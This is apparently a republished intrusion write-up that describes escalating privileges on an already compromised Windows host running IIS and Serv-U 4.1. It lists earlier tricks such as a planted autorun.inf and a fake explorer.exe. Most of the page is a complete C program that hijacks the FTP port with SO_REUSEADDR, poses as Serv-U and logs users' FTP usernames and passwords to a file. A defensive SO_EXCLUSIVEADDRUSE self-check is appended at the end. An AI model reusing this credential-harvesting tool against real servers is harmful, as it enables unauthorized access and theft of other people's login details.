
Gaining the highest privilege by exploiting a design flaw in the FTP server program itself

Date: 2021-07-31  Author: daque

Gaining the highest privilege by exploiting a design "flaw" in the FTP server program itself.

A virtual host, NTFS file system; the main services running on it are IIS and Serv-U. Ordinary user privileges had already been obtained through a flaw that allowed uploading ASP files and executing them. Because the administrator had configured the directories quite securely, only the root of the C: drive was writable; every other directory was read-only. Because of that secure configuration, the trick of replacing a program started by a service with one's own backdoor no longer worked, and the trick of adding an account with execute permission to Serv-U's configuration file did not work either. The friend doing the intrusion had already tried many methods, none of them feasible, so he passed this partially compromised system to me to see whether I had a way. (Apart from eating and sleeping, this friend spends all day at the computer looking for new vulnerabilities and attacking systems, and often shows me some odd systems.)

The plan was to find a way in through Serv-U, because the friend had already tried several other methods: 1. uploading an autorun.inf and a backdoor to the root of the drive (if the system allows autorun, the program specified in autorun.inf runs when the administrator browses the root directory); 2. uploading a backdoor to the root of the drive renamed explorer.exe (an old trick: when Windows searches for a file it starts from the root directory, and if it finds the file there first it executes that one; if the system still had this problem, the backdoor explorer.exe in the root directory would run when the administrator double-clicked "My Computer"); 3. every other odd method he could think of. None of them obtained the highest privilege.

The system should have had the latest patches; scanning IIS with several scanners found no vulnerabilities, and basically only IIS and Serv-U were available to work with. IIS was hopeless, so the only starting point was Serv-U. A small backdoor started with user privileges was already running on the system, but it only gave a user-level shell. After getting in, I looked at the system's configuration, installed programs and so on, and found that Serv-U was the only place where anything could be done. Serv-U was version 4.1, with 5 accounts, two of which had write permission, and their root directory was C:\ (the account information was learned by reading Serv-U's ini configuration file). If we could get the password of one of those accounts, we would have write permission. The key question was how to get those two accounts' passwords.

Some would think of cracking the passwords. That is the most primitive method, one to try only when there is no other way, and you should not expect a high chance of success: everyone should know what algorithm Serv-U uses to encrypt account passwords, and how long brute-forcing even an 8-character password would take with the fastest cracking program for that algorithm. So do not start by thinking about cracking. To get the passwords of users logging into Serv-U, some would think of sniffing; that is certainly a good method, but consider the privileges at hand (only ordinary user privileges), which are far from enough to run a driverless sniffer bound to the network card (tested; confirmed not to work). With sniffing ruled out, I suddenly thought of the shatter attack (interested readers can look at http://security.tombom.co.uk/shatter.html), but on seeing the sentence "any application on a given desktop can send a message to any window on the same desktop" I realised that my shell, launched from the command line with user privileges, did not seem to belong to any desktop, so it should not be possible to send messages to Serv-U's tray monitor. Before testing, I first emailed Serv-U's help center, asking mainly whether Serv-U 4.1 could be affected by the shatter attack. The reply was that version 4.1 does not accept messages sent from a different privilege level; Serv-U's tray monitor runs with the logged-in administrator's privileges, while I only had user privileges. That made it quite clear it was impossible, and since I had never studied or tested the shatter attack, I gave up on that too.

After much thought I had no good method and was about to give up, but in the shower it suddenly occurred to me that the port Serv-U opens allows rebinding (I don't know why, but many good ideas come in the shower, including solutions to many problems met while programming). If the port can be rebound, I could write a program that binds to Serv-U's open port, so that the authentication information of connections to Serv-U's port would be received by my program, and it would be possible to obtain the username and password of the account I needed. Of course, this program would have to act very much like Serv-U: for example, on receiving a connection it sends Serv-U's exact banner; when the connecting user sends a username, the program replies, as Serv-U would, with a "331 User name okay, need password." message asking for the password; after the user enters the password, the program sends the connector a message saying, roughly, that the connector's IP is not allowed to log in, and then disconnects.
To keep the administrator from noticing anything, after obtaining the password of one of the two useful accounts the program exits from memory, so the original Serv-U continues to work normally; before exiting, the program emails the obtained account and password to my Hotmail mailbox. To be safe, the account and password are also backed up to a file on disk (in case Hotmail's service is temporarily down and the mail cannot be received). Having got this far, the only remaining problem was to write the program. That was not difficult, since all of its parts had been written before, so after writing and testing it, it went to work. The program ran on that system, and I opened MSN and waited for mail. After about half a day I had the account and password I wanted. With this account I could log into that Serv-U, modify Serv-U's configuration, add an account with execute permission, and then use that new account to upload any backdoor or anything else to run on the system. At that point the highest privilege on the system was in hand.

Conclusion: the highest privilege could be obtained because of two "flaws". 1. The port Serv-U opens allows rebinding (calling it a flaw is a bit much, since Serv-U's designers did not expect your system to be broken into). I also emailed Serv-U to explain the problem, hoping that new versions of Serv-U would not allow the port to be rebound by other programs (in fact it only takes one more line of code). 2. Under user privileges it is possible to rebind the port of a program started as a service (Local System) (calling this a flaw is also a bit much). 3. Other FTP server programs may have the same problem of a logging-in user's account and password being stolen after the port is rebound, and other applications have the same problem if their port can be rebound; it only depends on whether the transmitted information is plaintext or encrypted with a strong algorithm. The problems caused by rebinding a port have existed for a long time, so I would not say I discovered them; this article merely gives one example of the serious consequences of a rebound port.

In the program code that follows, I removed the function that sends the account and password to a mailbox and only save the information to the file logfile.dat, because nobody uses this kind of code for good purposes, so it is better to keep the online write-up simpler.

codz:

//****************************************************************************************
// Version: V1.0
// Coder: WinEggDrop
// Date Release: NULL
// Purpose: To hijack an FTP server's open port and steal the connector's username and pass
// Test Platform: Win 2K Pro and Server SP4, Serv-U V4.1
// Compiled On: VC++ 6.0
// Others: This code is only to demonstrate the danger of an application allowing its
//         communication port to be re-bound (hijacked, in other words).
//         If your box is in a LAN, don't test it on your only box since it may not work
//****************************************************************************************
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <winsock2.h>
#include <windows.h>
#pragma comment(lib,"ws2_32.lib")

SOCKET ListenSocket = INVALID_SOCKET;
static CRITICAL_SECTION cs;
const char *LogFile = "c:\\logfile.dat";

// Function prototype declaration
//------------------------------------------------------------------------------------------------------
bool  StartHijack(const char *IPToBind, const char *Port);
bool  IsDigits(const char *String);
bool  InitSocket();
bool  CreateSocket(const char *IPToBind, const UINT ListenPort);
bool  HandleFTPRequest();
bool  SaveInfo(const char *FileName, const char *Info);
bool  SendSocket(const SOCKET ClientSocket, const char *Message);
bool  ReceiveSocketBuffer(const SOCKET ClientSocket, char *SocketBuffer, const int nSize);
bool  SendFTPBanner(const SOCKET ClientSocket);
bool  DeleteEnter(char *String);
DWORD WINAPI FTPThread(LPVOID Para);
bool  RetrieveFTPUserAndPass(const SOCKET ClientSocket);
//------------------------------------------------------------------------------------------------------
// End of function prototype declaration

int main(int argc, char *argv[])
{
    if (argc != 3)        // Not enough parameters
    {
        // Show the usage and an example, then exit the program
        printf("Usage:   %s BindedIP ListenPort\n", argv[0]);
        printf("Example: %s 192.168.0.1 21\n", argv[0]);
        return 0;
    }
    InitializeCriticalSection(&cs);
    StartHijack(argv[1], argv[2]);        // We are about to hijack the port
    DeleteCriticalSection(&cs);
    return 0;
}

//--------------------------------------------------------------------------------------------
// Purpose: To create a listening socket
// Return Type: Boolean
// Parameters:
//           In: const char *IPToBind   --> the IP address to bind
//           In: const UINT ListenPort  --> the listening port
//--------------------------------------------------------------------------------------------
bool CreateSocket(const char *IPToBind, const UINT ListenPort)
{
    struct sockaddr_in Client;
    ListenSocket = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);        // Create socket
    if (ListenSocket == INVALID_SOCKET)        // Fail to create socket
    {
        printf("Fail to create socket\n");
        return false;
    }
    memset(&Client, 0, sizeof(Client));
    Client.sin_family = AF_INET;
    Client.sin_port = htons((u_short)ListenPort);
    Client.sin_addr.s_addr = inet_addr(IPToBind);
    // Set socket option to hijack the port (re-bind or re-use, in other words)
    BOOL bReuse = TRUE;
    if (setsockopt(ListenSocket, SOL_SOCKET, SO_REUSEADDR, (char *)&bReuse, sizeof(bReuse)) != 0)
    {
        closesocket(ListenSocket);
        printf("Fail to hijack the port\n");
        return false;
    }
    // Bind socket
    if (bind(ListenSocket, (const struct sockaddr *)&Client, sizeof(Client)) == SOCKET_ERROR)
    {
        closesocket(ListenSocket);
        printf("Fail to bind port\n");
        return false;
    }
    // Listen on the port
    if (listen(ListenSocket, 5) == SOCKET_ERROR)
    {
        closesocket(ListenSocket);
        return false;
    }
    return true;
}// End of CreateSocket()

//--------------------------------------------------------------------------------------------
// Purpose: To check the parameters and start to hijack
// Return Type: Boolean
// Parameters:
//           In: const char *IPToBind --> the IP address to bind
//           In: const char *Port     --> the listening port
//--------------------------------------------------------------------------------------------
bool StartHijack(const char *IPToBind, const char *Port)
{
    if (!InitSocket())        // Init Winsock
    {
        printf("Fail to init socket\n");
        return false;
    }
    if (!IsDigits(Port))        // Check whether the port is invalid
    {
        printf("Invalid listen port\n");
        return false;
    }
    UINT ListenPort = atoi(Port);        // Get the port
    if (ListenPort == 0 || ListenPort > 65535)
    {
        printf("The listen port is out of bound\n");
        return false;
    }
    if (!CreateSocket(IPToBind, ListenPort))        // Create a TCP listening socket
    {
        printf("Fail to create socket\n");
        return false;
    }
    return HandleFTPRequest();
}// End of StartHijack()

// No need to comment
bool InitSocket()
{
    WSADATA Data;
    WORD Ver = MAKEWORD(2, 2);
    return (WSAStartup(Ver, &Data) == 0);
}// End of InitSocket()

//--------------------------------------------------------------------------------------------
// Purpose: To send a buffer through a socket
// Return Type: Boolean
// Parameters:
//           In: const SOCKET ClientSocket     --> the client's connected socket
//           In: const char *Message           --> the message to send
//--------------------------------------------------------------------------------------------
bool SendSocket(const SOCKET ClientSocket, const char *Message)
{
    return (send(ClientSocket, Message, (int)strlen(Message), 0) != SOCKET_ERROR);
}// End of SendSocket()

//--------------------------------------------------------------------------------------------
// Purpose: To send the FTP banner to the client
// Return Type: Boolean
// Parameters:
//           In: const SOCKET ClientSocket     --> the client's connected socket
//--------------------------------------------------------------------------------------------
bool SendFTPBanner(const SOCKET ClientSocket)
{
    const char *SendWelcomeInfo = "220 Serv-U FTP Server v4.1 for WinSock ready...\r\n";
    return SendSocket(ClientSocket, SendWelcomeInfo);
}// End of SendFTPBanner()

//--------------------------------------------------------------------------------------------
// Purpose: To receive a buffer from a socket
// Return Type: Boolean
// Parameters:
//           In: const SOCKET ClientSocket     --> the client's connected socket
//           In: const int nSize               --> the SocketBuffer's size
//          Out: char *SocketBuffer            --> buffer to receive data
//--------------------------------------------------------------------------------------------
bool ReceiveSocketBuffer(const SOCKET ClientSocket, char *SocketBuffer, const int nSize)
{
    return (recv(ClientSocket, SocketBuffer, nSize, 0) > 0);
}// End of ReceiveSocketBuffer()

//--------------------------------------------------------------------------------------------
// Purpose: To check whether a string only contains digits
// Return Type: Boolean
// Parameters:
//           In: const char *String     --> the string to be checked
//--------------------------------------------------------------------------------------------
bool IsDigits(const char *String)
{
    UINT i = 0;
    UINT StringLength = (UINT)strlen(String);
    for (i = 0; i < StringLength; i++)
    {
        if (String[i] < '0' || String[i] > '9')
        {
            return false;
        }
    }
    return true;
}// End of IsDigits()

//--------------------------------------------------------------------------------------------
// Purpose: To save information into a file
// Return Type: Boolean
// Parameters:
//           In: const char *FileName     --> file to store information
//           In: const char *Info         --> information to be stored into the file
//--------------------------------------------------------------------------------------------
bool SaveInfo(const char *FileName, const char *Info)
{
    HANDLE hFile = NULL;
    DWORD dwBytes = 0;
    bool Flag = false;
    // Open a file for writing
    hFile = CreateFile(FileName,
                       GENERIC_READ | GENERIC_WRITE,
                       FILE_SHARE_WRITE,
                       NULL,
                       OPEN_ALWAYS,
                       FILE_ATTRIBUTE_NORMAL,
                       NULL);
    if (hFile == INVALID_HANDLE_VALUE)        // Fail to open that file, something must be wrong
    {
        return false;
    }
    SetFilePointer(hFile, 0, NULL, FILE_END);        // Set the file pointer to the file end
    Flag = (WriteFile(hFile, Info, (DWORD)strlen(Info), &dwBytes, NULL) != 0);        // Write information into that file
    CloseHandle(hFile);        // Close the file handle
    return Flag;        // Return the WriteFile status
}// End of SaveInfo()

//--------------------------------------------------------------------------------------------
// Purpose: To remove a trailing line ending from a string (unused helper)
// Return Type: Boolean
// Parameters:
//           In: char *String     --> string to be modified
//--------------------------------------------------------------------------------------------
bool DeleteEnter(char *String)
{
    UINT Length = (UINT)strlen(String);
    if (Length >= 2 && (String[Length - 2] == '\r' || String[Length - 2] == '\n'))
    {
        String[Length - 2] = '\0';
    }
    else if (Length >= 1 && (String[Length - 1] == '\r' || String[Length - 1] == '\n'))
    {
        String[Length - 1] = '\0';
    }
    return true;
}// End of DeleteEnter()

//--------------------------------------------------------------------------------------------
// Purpose: To handle FTP requests
// Return Type: Boolean
// Parameters:  None
//--------------------------------------------------------------------------------------------
bool HandleFTPRequest()
{
    DWORD dwThreadId;
    SOCKET AcceptSocket = INVALID_SOCKET;
    SOCKET *CloneSocket = NULL;
    while (true)
    {
        sockaddr_in Client;
        int nSize = sizeof(Client);
        AcceptSocket = accept(ListenSocket, (sockaddr *)&Client, &nSize);
        if (AcceptSocket == INVALID_SOCKET)        // Something is wrong with the socket
        {
            break;        // Time to leave
        }
        CloneSocket = (SOCKET *)malloc(sizeof(AcceptSocket));        // Allocate RAM for the socket
        if (CloneSocket == NULL)        // Not enough RAM, very rare situation
        {
            closesocket(AcceptSocket);        // Close that connection
            continue;
        }
        *CloneSocket = AcceptSocket;        // Make a copy of the accepted socket
        HANDLE hThread = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)FTPThread, CloneSocket, 0, &dwThreadId);        // Create a thread
        if (hThread != NULL)
        {
            CloseHandle(hThread);
        }
    }
    closesocket(ListenSocket);
    return true;
}// End of HandleFTPRequest()

//--------------------------------------------------------------------------------------------
// Purpose: To steal the FTP username and password
// Return Type: Boolean
// Parameters:
//            In: const SOCKET ClientSocket  --> the connector's socket
//--------------------------------------------------------------------------------------------
bool RetrieveFTPUserAndPass(const SOCKET ClientSocket)
{
    const char *UserOK = "331 User name okay, need password.\r\n";
    char Buffer[MAX_PATH];
    memset(Buffer, 0, sizeof(Buffer));
    // Leave one byte so the received data is always NUL-terminated
    if (!ReceiveSocketBuffer(ClientSocket, Buffer, sizeof(Buffer) - 1))        // Fail to receive username
    {
        return false;
    }
    if (_strnicmp(Buffer, "USER", 4) == 0)        // We got the username, store it into the file
    {
        EnterCriticalSection(&cs);
        SaveInfo(LogFile, "---------------------------------------------------------------------------\r\n");
        SaveInfo(LogFile, Buffer);
        LeaveCriticalSection(&cs);
    }
    else        // Unknown command received
    {
        return false;
    }
    if (!SendSocket(ClientSocket, UserOK))        // Fail to send information
    {
        return false;
    }
    memset(Buffer, 0, sizeof(Buffer));
    if (!ReceiveSocketBuffer(ClientSocket, Buffer, sizeof(Buffer) - 1))        // Fail to receive password
    {
        return false;
    }
    if (_strnicmp(Buffer, "PASS", 4) == 0)        // We got the password, store it into the file
    {
        EnterCriticalSection(&cs);
        SaveInfo(LogFile, Buffer);
        SaveInfo(LogFile, "---------------------------------------------------------------------------\r\n\r\n");
        LeaveCriticalSection(&cs);
    }
    else        // Unknown command received
    {
        return false;
    }
    return true;
}// End of RetrieveFTPUserAndPass()

//--------------------------------------------------------------------------------------------
// Purpose: To handle the connector's request
// Return Type: DWORD
// Parameters:
//            In: LPVOID Para  --> the connector's socket
//--------------------------------------------------------------------------------------------
DWORD WINAPI FTPThread(LPVOID Para)
{
    SOCKET ClientSocket = *(SOCKET *)Para;        // Retrieve the socket
    free(Para);        // Free the allocated RAM
    if (!SendFTPBanner(ClientSocket))        // Fail to send the FTP banner
    {
        closesocket(ClientSocket);        // Close the connection
        return 1;
    }
    RetrieveFTPUserAndPass(ClientSocket);        // Get the connector's username and password
    SendSocket(ClientSocket, "530 Not logged in, unauthorized IP address.\r\n");        // Cheat the connector by sending this
    closesocket(ClientSocket);        // Disconnect the connector
    return 0;
}// End of FTPThread()
// End of file
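The conclusion above says the server-side fix is "one more line of code": a listener that refuses to share its address cannot be rebound by a later SO_REUSEADDR bind from another process. The following is an added example of that hardening together with a self-check, written for this page; it is not the article's tool nor Serv-U's code. It assumes a loopback listener on an ephemeral port and uses SO_EXCLUSIVEADDRUSE on Windows (where the article's rebind works) and plain POSIX sockets elsewhere (where binding a second socket to an address with an active listener is refused unless both sides opt into SO_REUSEPORT). The function names are this example's own.

```c
/* Added example: a listening socket hardened against port rebinding, plus a
   self-check that tries the same SO_REUSEADDR bind the article's tool relies on
   against our own listener. Runs on Windows (Winsock) and POSIX. */
#ifdef _WIN32
#include <winsock2.h>
#include <ws2tcpip.h>
#pragma comment(lib, "ws2_32.lib")
typedef SOCKET sock_t;
#define SOCK_INVALID INVALID_SOCKET
#define sock_close closesocket
#else
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <unistd.h>
typedef int sock_t;
#define SOCK_INVALID (-1)
#define sock_close close
#endif
#include <stdio.h>
#include <string.h>

static void loopback_addr(struct sockaddr_in *a, unsigned short port)
{
    memset(a, 0, sizeof(*a));
    a->sin_family = AF_INET;
    a->sin_port = htons(port);
    a->sin_addr.s_addr = htonl(INADDR_LOOPBACK);   /* 127.0.0.1: assumption of this example */
}

/* Open a TCP listener that refuses address sharing. On Windows this is the
   one-line fix the article asks Serv-U for: SO_EXCLUSIVEADDRUSE makes a later
   SO_REUSEADDR bind by another process fail. Returns SOCK_INVALID on error. */
sock_t open_exclusive_listener(unsigned short port)
{
    sock_t s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
    if (s == SOCK_INVALID) return SOCK_INVALID;
#ifdef _WIN32
    BOOL excl = TRUE;
    if (setsockopt(s, SOL_SOCKET, SO_EXCLUSIVEADDRUSE, (const char *)&excl, sizeof(excl)) != 0) {
        sock_close(s);
        return SOCK_INVALID;
    }
#endif
    struct sockaddr_in a;
    loopback_addr(&a, port);
    if (bind(s, (struct sockaddr *)&a, sizeof(a)) != 0 || listen(s, 5) != 0) {
        sock_close(s);
        return SOCK_INVALID;
    }
    return s;
}

/* Self-check against our own listener: try a second SO_REUSEADDR bind to the
   same address. Returns 1 if it succeeds (the port could be hijacked),
   0 if the stack refuses it, -1 on a socket error. */
int rebind_attempt(unsigned short port)
{
    sock_t s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
    if (s == SOCK_INVALID) return -1;
    int reuse = 1;
    setsockopt(s, SOL_SOCKET, SO_REUSEADDR, (const char *)&reuse, sizeof(reuse));
    struct sockaddr_in a;
    loopback_addr(&a, port);
    int hijackable = (bind(s, (struct sockaddr *)&a, sizeof(a)) == 0) ? 1 : 0;
    sock_close(s);
    return hijackable;
}

/* Open a hardened listener on an ephemeral loopback port, learn which port
   was assigned, and report whether it can be rebound (0 = safe, 1 = hijackable). */
int exclusive_listener_is_rebindable(void)
{
#ifdef _WIN32
    WSADATA wsa;
    if (WSAStartup(MAKEWORD(2, 2), &wsa) != 0) return -1;
#endif
    sock_t l = open_exclusive_listener(0);
    if (l == SOCK_INVALID) return -1;
    struct sockaddr_in bound;
    socklen_t len = sizeof(bound);
    int result = -1;
    if (getsockname(l, (struct sockaddr *)&bound, &len) == 0)
        result = rebind_attempt(ntohs(bound.sin_port));
    sock_close(l);
#ifdef _WIN32
    WSACleanup();
#endif
    return result;
}

int main(void)
{
    int r = exclusive_listener_is_rebindable();
    printf("exclusive listener rebindable: %d (0 = safe, 1 = hijackable, -1 = error)\n", r);
    return r == 0 ? 0 : 1;
}
```

The same self-check run against a listener opened without SO_EXCLUSIVEADDRUSE on the Windows versions the article targets is what distinguishes a server that can be hijacked from one that cannot; on a hardened listener the second bind fails, and the only thing an attacker-controlled bind could win is a port nobody is listening on yet, which is why services should bind early and exclusively.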

Copyright © 2019-2021 大雀软件园(www.daque.cn) All Rights Reserved.